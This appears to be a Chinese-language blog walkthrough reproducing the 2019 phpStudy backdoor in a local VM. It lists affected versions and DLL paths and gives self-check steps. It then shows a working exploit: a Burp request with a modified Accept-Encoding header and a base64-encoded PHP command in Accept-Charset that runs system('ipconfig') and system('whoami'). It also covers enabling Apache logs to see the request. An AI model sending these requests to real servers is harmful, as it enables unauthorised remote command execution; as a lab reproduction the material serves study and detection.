phpStudy backdoor 2019后门漏洞复现过程记录

1、受影响版本及路径：

phpStudy2016

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

2、环境准备：

phpStudy2018下载链接：百度网盘 请输入提取码 提取码：nlnq

部署在win10虚拟机里，解压后运行后访问localhost/phpinfo.php即成功安装

3、自查是否存在后门漏洞：

1）可以通过查看路径为PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll的文件，查找到@eval(%s('%s'));代码

 2）查看php探针→PHP已编译模块检测，存在xmlrpc

 3）查看php.ini文件，检索到extension=php_xmlrpc.dll

 4）打开Burpsuite抓phpinfo.php页面的请求包，发送到Repeater重放器模块

Accept-Encoding:gzip,deflate 
#修改参数，gzip逗号后面默认有一个空格，需要删掉

Accept-charset:c3lzdGVtKCdpcGNvbmZpZycpOw==
#添加字段Accept-charset，参数是经过base64编码后的需要执行的命令
此处为system('ipconfig');

Base64在线编码/解码网站：Base64 编码/解码 | 菜鸟工具

Accept-Encoding:gzip,deflate 

Accept-charset:c3lzdGVtKCd3aG9hbWknKTs= 
#此处为system('whoami');

复现成功

（4、 查看Apache的access.log日志：）

默认是没有的，可以通过修改httpd-conf文件来打开：

具体就是找到access.log字符这一行，将注释符删掉，保存后再重启phpstudy服务

根据以下步骤就可以看到access.log

  

可以看到我们bp发送请求的包被记录下来了

 参考文章：

Apache logs目录下找不见access.log文件解决办法_RuoLi_s的博客-CSDN博客

​​​​​​​phpStudy后门漏洞复现 | LuckySec